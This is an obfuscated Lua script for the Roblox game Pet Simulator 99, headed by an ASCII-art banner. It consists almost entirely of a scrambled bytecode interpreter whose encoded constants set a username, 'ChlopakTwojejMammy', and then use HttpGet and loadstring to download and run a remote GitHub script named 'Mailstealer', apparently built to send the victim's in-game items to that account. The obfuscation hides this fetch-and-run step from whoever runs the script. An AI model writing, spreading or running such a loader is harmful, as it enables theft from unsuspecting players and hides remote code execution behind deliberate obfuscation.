--[[

▀█████████▄  ▄██   ▄         ▄█     █▄     ▄████████  ▄█     █▄   ▄██████▄     ▄█   ▄█▄ 
  ███    ███ ███   ██▄      ███     ███   ███    ███ ███     ███ ███    ███   ███ ▄███▀ 
  ███    ███ ███▄▄▄███      ███     ███   ███    ███ ███     ███ ███    ███   ███▐██▀   
 ▄███▄▄▄██▀  ▀▀▀▀▀▀███      ███     ███   ███    ███ ███     ███ ███    ███  ▄█████▀    
▀▀███▀▀▀██▄  ▄██   ███      ███     ███ ▀███████████ ███     ███ ███    ███ ▀▀█████▄    
  ███    ██▄ ███   ███      ███     ███   ███    ███ ███     ███ ███    ███   ███▐██▄   
  ███    ███ ███   ███      ███ ▄█▄ ███   ███    ███ ███ ▄█▄ ███ ███    ███   ███ ▀███▄ 
▄█████████▀   ▀█████▀        ▀███▀███▀    ███    █▀   ▀███▀███▀   ▀██████▀    ███   ▀█▀ 
                                                                              ▀         

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=0;local v70;while true do if (v69==0) then v70=v2(v0(v30,16));if v19 then local v100=v5(v70,v19);v19=nil;return v100;else return v70;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v71=0 -(180 -(67 + 113)) ;local v72;while true do if (v71==(0 + 0)) then v72=(v31/((5 -3)^(v32-(1 -0))))%(((3 + 1) -2)^(((v33-((1522 -902) -((1018 -463) + 64))) -(v32-((1416 -(87 + 263)) -(68 + 997)))) + (1271 -(226 + 1044)))) ;return v72-(v72%(932 -(857 + 74))) ;end end else local v73=0 -0 ;local v74;while true do if (v73==(117 -(32 + (337 -252)))) then v74=(2 + 0)^(v32-(569 -(367 + 201))) ;return (((v31%(v74 + v74))>=v74) and (958 -(892 + (120 -55)))) or ((1879 -(802 + 150)) -(214 + 713)) ;end end end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) ;v34=(582 + 416) -(915 + 82) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1189 -(1069 + 118)) ;return (v37 * 256) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (6 -3) );v18=v18 + (8 -4) ;return (v41 * (2916682 + 13860534)) + (v40 * (116444 -(51699 -(368 + 423)))) + (v39 * (254 + 2)) + v38 ;end local function v24()local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(0 + 0)) then v43=v23();v44=v23();v42=886 -(261 + 624) ;end if (v42==(21 -(10 + (709 -(376 + 325))))) then if (v47==((1769 -689) -(1020 + 60))) then if (v46==(1423 -(630 + (2439 -1646)))) then return v48 * (0 -0) ;else v47=443 -(416 + 26) ;v45=0 -0 ;end elseif (v47==(7047 -5000)) then return ((v46==(0 + 0)) and (v48 * ((1 -(0 + 0))/(438 -(145 + 293))))) or (v48 * NaN) ;end return v8(v48,v47-(1453 -(44 + 386)) ) * (v45 + (v46/((1488 -(998 + 488))^52))) ;end if (v42==((2 -1) + 1)) then v47=v20(v44,18 + 3 ,121 -90 );v48=((v20(v44,804 -(201 + 571) )==(1 + 0)) and  -(1056 -(87 + 968))) or (1139 -((130 -(9 + 5)) + 1022)) ;v42=12 -9 ;end if (v42==((377 -(85 + 291)) + (1265 -(243 + 1022)))) then v45=3 -2 ;v46=(v20(v44,3 -2 ,879 -(814 + 45) ) * ((4 -2)^(1849 -(1703 + 114)))) + v43 ;v42=1 + (3 -2) ;end end end local function v25(v49)local v50=0 + 0 ;local v51;local v52;while true do if (v50==(1182 -(1123 + 57))) then v52={};for v79=1 + 0 , #v51 do v52[v79]=v2(v1(v3(v51,v79,v79)));end v50=257 -(163 + 91) ;end if (v50==(1930 -(1869 + 61))) then v51=nil;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=1;end if (v50==(1 + (2 -0))) then return v6(v52);end if (v50==((1 + 2) -(2 -0))) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=2;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=216 -(42 + 174) ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53~=1) then else local v75=0;while true do if (v75~=1) then else v53=2;break;end if (v75~=0) then else v56=nil;v57=nil;v75=1 + 0 ;end end end if (v53~=3) then else v60=nil;v61=nil;v53=4 + 0 ;end if (v53~=2) then else v58=nil;v59=nil;v53=3;end if (v53==(5 -1)) then while true do if ((701 -(271 + 429))~=v54) then else v57=nil;v58=nil;v54=2;end if (v54==(0 + 0)) then local v98=1500 -(1408 + 92) ;while true do if ((2 -1)~=v98) then else v54=1087 -(461 + 625) ;break;end if (v98==(0 + 0)) then v55=1288 -(993 + 295) ;v56=nil;v98=1 + 0 ;end end end if (v54~=(1173 -(418 + 753))) then else local v99=0 + 0 ;while true do if (v99~=(1934 -(565 + 1368))) then else v54=1 + 2 ;break;end if (v99~=(0 + 0)) then else v59=nil;v60=nil;v99=1 + 0 ;end end end if (v54~=3) then else v61=nil;while true do local v101=529 -(406 + 123) ;local v102;local v103;while true do if (v101==(0 + 0)) then v102=1769 -(1749 + 20) ;v103=nil;v101=1;end if (v101~=(1 + 0)) then else while true do if (v102==(1322 -(1249 + 73))) then v103=0 -0 ;while true do if (v103~=(0 + 0)) then else if (v55~=(2 -1)) then else local v157=304 -(244 + 60) ;local v158;local v159;while true do if ((1 + 0)~=v157) then else while true do if (v158==(476 -(41 + 435))) then v159=1145 -(466 + 679) ;while true do if (v159==(0 -0)) then local v173=0;while true do if (v173~=(0 -0)) then else local v184=0;while true do if (v184~=(1901 -(106 + 1794))) then else v173=1126 -(936 + 189) ;break;end if (v184~=(0 + 0)) then else v59={v56,v57,nil,v58};v60=v23();v184=1 + 0 ;end end end if (v173~=(2 -1)) then else v159=115 -(4 + 110) ;break;end end end if (v159==(585 -(57 + 527))) then v61={};v55=1429 -(41 + 1386) ;break;end end break;end end break;end if (v157~=(103 -(17 + 86))) then else v158=1875 -(157 + 1718) ;v159=nil;v157=1 + 0 ;end end end if (v55==(3 -1)) then local v160=0 -0 ;local v161;while true do if (v160==(0 -0)) then v161=0;while true do if (v161==(0 -0)) then local v166=166 -(122 + 44) ;while true do if (v166~=(1019 -(697 + 321))) then else v161=1;break;end if (v166==(0 -0)) then for v175=2 -1 ,v60 do local v176=0 -0 ;local v177;local v178;local v179;while true do if ((1 + 0)==v176) then v179=nil;while true do if ((1 + 0)~=v177) then else if (v178==(1 -0)) then v179=v21()~=(65 -(30 + 35)) ;elseif (v178==(1 + 1)) then v179=v24();elseif (v178~=(5 -2)) then else v179=v25();end v61[v175]=v179;break;end if ((0 -0)~=v177) then else local v191=1227 -(322 + 905) ;while true do if (v191~=(1 + 0)) then else v177=1;break;end if (v191==(1189 -(449 + 740))) then v178=v21();v179=nil;v191=1258 -(1043 + 214) ;end end end end break;end if (v176==(0 -0)) then local v185=1212 -(323 + 889) ;while true do if (v185~=(0 -0)) then else v177=947 -(245 + 702) ;v178=nil;v185=581 -(361 + 219) ;end if (v185~=(321 -(53 + 267))) then else v176=1 + 0 ;break;end end end end end v59[3]=v21();v166=1;end end end if (v161~=(1 + 0)) then else for v169=1899 -(260 + 1638) ,v23() do local v170=440 -(382 + 58) ;local v171;local v172;while true do if (v170==(414 -(15 + 398))) then while true do if (v171==(982 -(18 + 964))) then v172=v21();if (v20(v172,3 -2 ,3 -2 )~=(0 + 0)) then else local v186=0;local v187;local v188;local v189;while true do if (v186~=(2 + 1)) then else if (v20(v188,3,5 -2 )==(851 -(20 + 830))) then v189[4]=v61[v189[1209 -(902 + 303) ]];end v56[v169]=v189;break;end if (v186~=(0 + 0)) then else local v194=0 -0 ;while true do if (v194==(0 -0)) then v187=v20(v172,2,1 + 2 );v188=v20(v172,4,1696 -(1121 + 569) );v194=1;end if (v194==(215 -(22 + 192))) then v186=1;break;end end end if (v186~=(128 -(116 + 10))) then else if (v20(v188,1,1 + 0 )~=(739 -(542 + 196))) then else v189[1465 -(1404 + 59) ]=v61[v189[2]];end if (v20(v188,5 -3 ,2)==(1 -0)) then v189[1 + 2 ]=v61[v189[2 + 1 ]];end v186=565 -(334 + 228) ;end if (v186==(3 -2)) then local v195=0 + 0 ;while true do if (v195~=(2 -1)) then else v186=4 -2 ;break;end if (0==v195) then local v202=1551 -(1126 + 425) ;while true do if (v202==(406 -(118 + 287))) then v195=3 -2 ;break;end if (v202==(1121 -(118 + 1003))) then v189={v22(),v22(),nil,nil};if (v187==0) then local v203=0 -0 ;local v204;while true do if (0~=v203) then else v204=0 + 0 ;while true do if (v204==(977 -(553 + 424))) then v189[3]=v22();v189[4]=v22();break;end end break;end end elseif (v187==(2 -1)) then v189[5 -2 ]=v23();elseif (v187==2) then v189[3 + 0 ]=v23() -((4 -2)^(16 + 0)) ;elseif (v187==3) then local v209=0 -0 ;while true do if (v209==0) then v189[2 + 1 ]=v23() -((1 + 1)^16) ;v189[3 + 1 ]=v22();break;end end end v202=1 -0 ;end end end end end end end break;end end break;end if (v170==(0 + 0)) then local v180=0 -0 ;local v181;while true do if (v180==0) then v181=0 -0 ;while true do if (0==v181) then local v192=0 -0 ;while true do if (v192~=(0 -0)) then else v171=0 + 0 ;v172=nil;v192=4 -3 ;end if (v192==(2 -1)) then v181=754 -(239 + 514) ;break;end end end if (v181~=(1 + 0)) then else v170=850 -(254 + 595) ;break;end end break;end end end end end v55=129 -(55 + 71) ;break;end end break;end end end v103=1330 -(797 + 532) ;end if (v103~=(1 -0)) then else if ((1793 -(573 + 1217))~=v55) then else local v162=0 -0 ;local v163;while true do if (0~=v162) then else v163=0 + 0 ;while true do if (v163~=(0 + 0)) then else local v167=0 + 0 ;while true do if (v167~=(0 -0)) then else for v182=1,v23() do v57[v182-(1203 -(373 + 829)) ]=v28();end return v59;end end end end break;end end end if (v55~=0) then else local v164=731 -(476 + 255) ;local v165;while true do if (v164==(1130 -(369 + 761))) then v165=0 + 0 ;while true do if (v165==(1 -0)) then v58={};v55=1;break;end if (v165~=(0 -0)) then else local v168=0;while true do if (v168==(0 -0)) then v56={};v57={};v168=1;end if (v168~=(239 -(64 + 174))) then else v165=1 + 0 ;break;end end end end break;end end end break;end end break;end end break;end end end break;end end break;end if (v53==(0 + 0)) then v54=0 -0 ;v55=nil;v53=337 -(144 + 192) ;end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end if (v65==1) then v68=v62[3];return function(...)local v81=v66;local v82=v67;local v83=v68;local v84=v27;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do v93=v81[v85];v94=v93[1];if (v94<=9) then if (v94<=4) then if (v94<=1) then if (v94>0) then v91[v93[2]]=v93[3];else v85=v93[3];end elseif (v94<=2) then if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v64;else v91[v93[2]]=v64[v93[3]];end elseif (v94==3) then v64[v93[3]]=v91[v93[2]];else do return;end end elseif (v94<=6) then if (v94>5) then local v111=v93[2];v91[v111]=v91[v111](v13(v91,v111 + 1 ,v86));else v91[v93[2]]();end elseif (v94<=7) then local v113=v93[2];local v114=v91[v93[3]];v91[v113 + 1 ]=v114;v91[v113]=v114[v93[4]];elseif (v94==8) then v64[v93[3]]=v91[v93[2]];elseif (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v94<=14) then if (v94<=11) then if (v94>10) then local v118=0;local v119;local v120;local v121;local v122;while true do if (v118==0) then v119=v93[2];v120,v121=v84(v91[v119](v13(v91,v119 + 1 ,v93[3])));v118=1;end if (v118==2) then for v151=v119,v86 do v122=v122 + 1 ;v91[v151]=v120[v122];end break;end if (v118==1) then v86=(v121 + v119) -1 ;v122=0;v118=2;end end else do return;end end elseif (v94<=12) then v91[v93[2]]();elseif (v94>13) then v85=v93[3];elseif (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v94<=16) then if (v94==15) then local v123=v93[2];local v124,v125=v84(v91[v123](v13(v91,v123 + 1 ,v93[3])));v86=(v125 + v123) -1 ;local v126=0;for v129=v123,v86 do local v130=0;while true do if (v130==0) then v126=v126 + 1 ;v91[v129]=v124[v126];break;end end end elseif ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v64;else v91[v93[2]]=v64[v93[3]];end elseif (v94<=17) then local v127=v93[2];v91[v127]=v91[v127](v13(v91,v127 + 1 ,v86));elseif (v94>18) then v91[v93[2]]=v93[3];else local v144=v93[2];local v145=v91[v93[3]];v91[v144 + 1 ]=v145;v91[v144]=v145[v93[4]];end v85=v85 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D6503123O0043686C6F70616B54776F6A656A4D616D2O79030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F50657453696D756C61746F722O392F6D61696E2F4D61696C737465616C6572000F3O0012133O00013O0026093O00010001000100040E3O00010001001213000100033O001203000100023O001210000100043O001210000200053O002007000200020006001213000400074O000B000200044O000600013O00022O000C00010001000100040E3O000E000100040E3O000100012O000A3O00017O00",v9(),...);
